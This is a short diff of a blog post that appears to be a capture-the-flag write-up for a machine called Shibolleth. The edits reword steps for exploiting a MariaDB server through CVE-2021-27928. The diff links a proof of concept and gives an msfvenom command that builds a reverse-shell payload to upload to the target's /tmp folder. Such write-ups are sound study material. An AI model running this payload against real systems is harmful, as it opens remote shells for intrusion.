Bunnys666/Bunnys666.github.io/_posts/2022-04-25-shibolleth.md

 ![](/assets/img/shibolleth/14.png)

-thats hash didnt show me the way, so the thing is we had to exploit the maria db
+thats hash didnt show me the way, so the thing is we had to exploit the mysql version

 ![](/assets/img/shibolleth/15.png)

-this maria db version affected of CVE-2021-27928, you can read the poc in [here](https://github.com/Al1ex/CVE-2021-27928).
+this MariaDB version affected of CVE-2021-27928, you can read the poc in [here](https://github.com/Al1ex/CVE-2021-27928).

-create the payload and upload into target in folder /tmp
+create the payload using `msfvenom` and upload into target in /tmp folder

 ```
 msfvenom -p linux/x64/shell_reverse_tcp LHOST=tun0 LPORT=9002 -f elf-so -o CVE-2021-27928.so